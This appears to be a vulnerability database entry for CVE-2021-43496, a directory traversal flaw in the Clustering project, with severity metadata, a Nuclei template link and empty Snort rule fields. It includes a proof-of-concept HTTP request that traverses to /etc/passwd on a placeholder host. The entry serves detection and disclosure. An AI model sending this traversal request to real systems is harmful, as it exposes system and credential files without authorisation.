🔙 목록으로 돌아가기

CVE-2021-43496: Clustering Local File Inclusion

TitleClustering Local File Inclusion
AuthorEvan Rubinstein
SeverityHigh
ImpactThis vulnerability can result in unauthorized access to sensitive files and directories, as well as the execution of arbitrary code on the affected system.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.40172
CVE IDCVE-2021-43496
CWE IDCWE-22
Tags cve2021 cve lfi clustering clustering_project vuln

🔍 Vulnerability Description

Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.

🌐 HTTP Request

GET /img/../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-43496.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-43496.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A